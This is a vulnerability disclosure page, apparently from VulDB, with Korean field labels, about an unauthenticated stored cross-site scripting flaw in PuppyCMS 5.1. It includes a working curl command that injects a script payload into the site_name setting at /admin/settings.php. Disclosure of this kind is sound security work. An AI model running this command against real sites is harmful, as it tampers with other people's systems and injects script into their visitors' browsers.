| 제목 | PuppyCMS >= 5.1 - Cross-site Scripting Stored |
|---|
| 설명 | # Exploit Title: PuppyCMS >= 5.1 - Cross-site Scripting Stored
# Date: 2022-10-11
# Exploit Author: Mr Empy
# Vendor Homepage: https://github.com/choregus
# Software Link: https://github.com/choregus/puppyCMS
# Version: >= 5.1
# Tested on: Linux
Title:
================
PuppyCMS >= 5.1 - Cross-site Scripting Stored
Summary:
================
PuppyCMS versions below or equal to 5.1 are vulnerable to a Cross-site Scripting Stored exploit, which allows the injection of arbitrary Javascript code through the site_name parameter without authentication. Exploitation can be used to manipulate the capabilities of victims' browsers.
Severity Level:
================
5.8 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N
Affected Product:
================
PuppyCMS >= v5.1
Steps to Reproduce:
================
1. Open your terminal and run this command:
TARGET="http://x.x.x.x/puppyCMS";XSS_PAYLOAD='<script>alert("PuppyCMS XSS")</script>';curl "$TARGET/admin/settings.php" -X POST -d "site_name=$XSS_PAYLOAD&site_root=/&password=&password-repeat=&site_template=top-nav-red&from_email=your%40email.com&submit=Submit" |
|---|
| 원천 | ⚠️ https://github.com/choregus/puppyCMS |
|---|
| 사용자 | mrempy (UID 24379) |
|---|
| 제출 | 2022. 10. 12. AM 03:24 (4 연령 ago) |
|---|
| 모더레이션 | 2022. 10. 12. AM 11:25 (8 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 210699 [puppyCMS 까지 5.1 /admin/settings.php site_name 크로스 사이트 스크립팅] |
|---|
| 포인트들 | 20 |
|---|